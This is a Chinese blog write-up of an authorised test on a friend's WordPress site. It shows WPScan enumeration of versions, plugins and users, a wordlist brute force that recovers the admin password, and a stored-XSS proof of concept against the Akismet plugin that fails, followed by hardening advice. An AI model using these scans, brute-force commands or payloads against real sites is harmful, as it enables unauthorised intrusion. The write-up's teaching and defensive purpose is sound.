对朋友网站的一次友情测试
收藏

本文作者:Cherishao(信安之路作者团队成员 & 应急响应小组小组长)

成员招募:信安之路应急响应小组寻找志同道合的朋友

朋友部署了个 Wordpress 的站点,让有时间的时候帮忙测下安全性怎么样,于是呢,有了这篇文章,本意想着WPScan+MSF 这套组合拳可以打通的,奈何现实总是充满了惊(yi)喜(wai),本文主要围绕 WPScan 结合渗透测试的常规测试方法从信息收集、漏洞利用、防护措施进行介绍。

一、环境介绍

1、测试环境

测试机的版本如下

root@ChengKaoAo:~# uname -aLinux ChengKaoAo 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 GNU/Linux

2、待测环境

URL:https://sec.cherishao.com/IP:192.160.121.13

看完了本文,对此感兴趣的朋友亦可以对自己的 WordPress 站点进行测试,大佬请忽略!!!

二、关于 WPScan

WPScan 是 Kali Linux 默认自带的一款漏洞扫描工具,可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息,同时还可以实现对未加防护的 Wordpress 站点暴力破解用户名密码。

Kali 自带了 WPScan ,需要更新下才能使用,笔者首次升级的时候,更新失败,原因是:Kali 源的问题,升级更新 Kali 源之后,利用 Wpscan update ,更新效果如下:

root@ChengKaoAo:~# wpscan update_______________________________________________________________        __          _______   _____                          \ \        / /  __ \ / ____|                          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \            \  /\  /  | |     ____) | (__| (_| | | | |            \/  \/   |_|    |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team Version 2.9.3 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart________________________________________________________________complete ok
[!] The WordPress URL supplied 'http://update/' seems to be down. Maybe the site is blocking wpscan so you can try the --random-agent

三、信息收集

1、 WordPress 版本及相关信息收集

root@ChengKaoAo:~# wpscan -u 192.160.121.13 _______________________________________________________________        __          _______   _____                          \ \        / /  __ \ / ____|                          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \            \  /\  /  | |     ____) | (__| (_| | | | |            \/  \/   |_|    |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team Version 2.9.3 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart________________________________________________________________
[i] The remote host tried to redirect to: https://sec.cherishao.com/Y[+] URL: https://sec.cherishao.com/[+] Started: Wed Sep 4 09:49:52 2019
[+] robots.txt available under: 'https://sec.cherishao.com/robots.txt'[!] The WordPress 'https://sec.cherishao.com/readme.html' file exists exposing a version number[+] Interesting header: LINK: <https://sec.cherishao.com/index.php/wp-json/>; rel="https://api.w.org/"[+] Interesting header: SERVER: Apache/2.4.39 (Unix) OpenSSL/1.0.2k-fips PHP/7.3.7[+] Interesting header: X-POWERED-BY: PHP/7.3.7[+] XML-RPC Interface available under: https://sec.cherishao.com/xmlrpc.php
[+] WordPress version 5.2.2 (Released on 2019-06-18) identified from meta generator, links opml
[+] WordPress theme in use: spacious - v1.6.3
[+] Name: spacious - v1.6.3 | Last updated: 2019-08-27T00:00:00.000Z | Location: https://sec.cherishao.com/wp-content/themes/spacious/ | Readme: https://sec.cherishao.com/wp-content/themes/spacious/readme.txt[!] The version is out of date, the latest version is 1.6.6 | Style URL: https://sec.cherishao.com/wp-content/themes/spacious/style.css | Theme Name: Spacious | Theme URI: https://themegrill.com/themes/spacious | Description: Spacious is an incredibly spacious multipurpose responsive theme coded & designed with a lot of c... | Author: ThemeGrill | Author URI: https://themegrill.com
[+] Enumerating plugins from passive detection ... | 1 plugin found:
[+] Name: wedocs - v1.5 | Latest version: 1.5 (up to date) | Last updated: 2019-07-11T05:33:00.000Z | Location: https://sec.cherishao.com/wp-content/plugins/wedocs/ | Readme: https://sec.cherishao.com/wp-content/plugins/wedocs/readme.txt
[+] Finished: Wed Sep 4 09:50:01 2019[+] Requests Done: 53[+] Memory used: 107.57 MB[+] Elapsed time: 00:00:08

收集到的敏感信息有:

版本:WordPress version 5.2.2 (Released on 2019-06-18)路径:/robots.txt、/readme.html、/wp-login.php主题:spacious - v1.6.3 , the latest version is 1.6.6其它:SERVER: Apache/2.4.39 (Unix) OpenSSL/1.0.2k-fips PHP/7.3.7

2、枚举可以利用的插件

root@ChengKaoAo:~# wpscan -u 192.160.121.13  --enumerate vp _______________________________________________________________        __          _______   _____                          \ \        / /  __ \ / ____|                          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \            \  /\  /  | |     ____) | (__| (_| | | | |            \/  \/   |_|    |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team Version 2.9.3 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart________________________________________________________________----------[+] Enumerating installed plugins (only ones with known vulnerabilities) ...
Time: 00:02:00 <=====================================================================================================================================> (2060 / 2060) 100.00% Time: 00:02:00
[+] We found 1 plugins:
[+] Name: akismet | Latest version: 4.1.2 | Last updated: 2019-05-14T15:05:00.000Z | Location: https://sec.cherishao.com/wp-content/plugins/akismet/
[!] We could not determine a version so all vulnerabilities are printed out
[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS) Reference: https://wpvulndb.com/vulnerabilities/8215 Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/ Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9357[i] Fixed in: 3.1.5
[+] Finished: Wed Sep 4 10:03:16 2019[+] Requests Done: 2121[+] Memory used: 224.039 MB[+] Elapsed time: 00:02:12

发现插件 Akismet 存在 XSS ,这里发现的风险项仅做参考,还是要以实际验证为主。

3、枚举下 Wordpress 的用户名

root@ChengKaoAo:~# wpscan -u 192.160.121.13  --enumerate u_______________________________________________________________        __          _______   _____                          \ \        / /  __ \ / ____|                          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \            \  /\  /  | |     ____) | (__| (_| | | | |            \/  \/   |_|    |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team Version 2.9.3 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart________________________________________________________________------[+] Enumerating plugins from passive detection ... | 1 plugin found:
[+] Name: wedocs - v1.5 | Latest version: 1.5 (up to date) | Last updated: 2019-07-11T05:33:00.000Z | Location: https://sec.cherishao.com/wp-content/plugins/wedocs/ | Readme: https://sec.cherishao.com/wp-content/plugins/wedocs/readme.txt
[+] Enumerating usernames ...[+] Identified the following 1 user/s: +----+----------+-----------------------+ | Id | Login | Name | +----+----------+-----------------------+ | 1 | admin | admin – cherishao | +----+----------+-----------------------+
[+] Finished: Wed Sep 4 10:08:11 2019[+] Requests Done: 67[+] Memory used: 108.809 MB[+] Elapsed time: 00:00:12

四、漏洞利用(验证)

1、口令爆破

通过收集到的敏感信息 1 ,我们可以通过 Google 去检索 Apache、PHP 版本是否存在可利用的漏洞,从中我们也知道后台的登陆路径为 /wp-login.php ,结合 3 枚举到的用户名信息可以尝试构造字典进行爆破。

root@ChengKaoAo:~# wpscan -u 192.160.121.13  --wordlist /root/dic.txt --username admin_______________________________________________________________        __          _______   _____                          \ \        / /  __ \ / ____|                          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \            \  /\  /  | |     ____) | (__| (_| | | | |            \/  \/   |_|    |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team Version 2.9.3 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart________________________________________________________________------[+] Starting the password brute forcer [!] ERROR: We received an unknown response for login: admin and password: admin2019 Brute Forcing 'admin' Time: 00:02:00 <===================================================== > (2108 / 2109) 99.95% ETA: 00:00:00

这里尝试了下,常见的弱口令,爆出了 password:admin2019 ,内心一阵小庆幸,继续验证我们扫出来的存储型 XSS :)

2、插件的 XSS 验证

1)漏洞相关细节

根据 https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html 提示,该插件的 <abbr> 标签的 title 可以用单引号进行截断。

<abbr title='" class="comment-link"><a href='href="'> :-) <abbr title='" ' class="comment-link">x</abbr></a>

原理搞懂了,我们可以进行构造 POC 如下,XSS 语句正常解析的情况下,鼠标悬停在留言上方即会触发 Payload

<abbr class="comment-link" '="" href="'> :-) <abbr title='" onmouseover="alert(1338);"title="" class="comment-link"><a href=">xss?</abbr>

说走咋就走,去尝试提交一个留言看一看,在留言界面植入构造好的 XSS 语句 

成功留言之后,发现表情(emoji)依旧还在,Nani 猜测是插件没有启用,或者新的 Wordpress 版本做了过滤。

进后台管理瞅一瞅,确实没有执行成功。

查看插件的启用状态,未启用...

五、防护措施

1、关于密码爆出防护措施

1)避免 WordPress 用户列表被列举,不要把用户名作为昵称,并且不要使用已经被大众知道的用户名。最好的方式是选择一个包含随机字符的名字做用户名并且使用其他名字作为昵称。

2)限制一个 IP 地址的尝试登录次数。WordPress 有很多插件可以实现这个功能。列如有一个插件叫

Brute Force Login Protection (当然你也可以写一个脚本防止爆出个人密码)

2:如何防范扫描插件、主题、TimThumb文件

使用Block Bad Queries (BBQ)插件,就可以屏蔽和禁止这类扫描。

六、思考总结

在进行安全测试的时候,尽可能多的去收集可利用的信息,知己知彼方能百战不殆,同样作为自己站点的守护者多了解一些攻击者使用的工具和思路有时候也可以起到事半功倍的奇效的。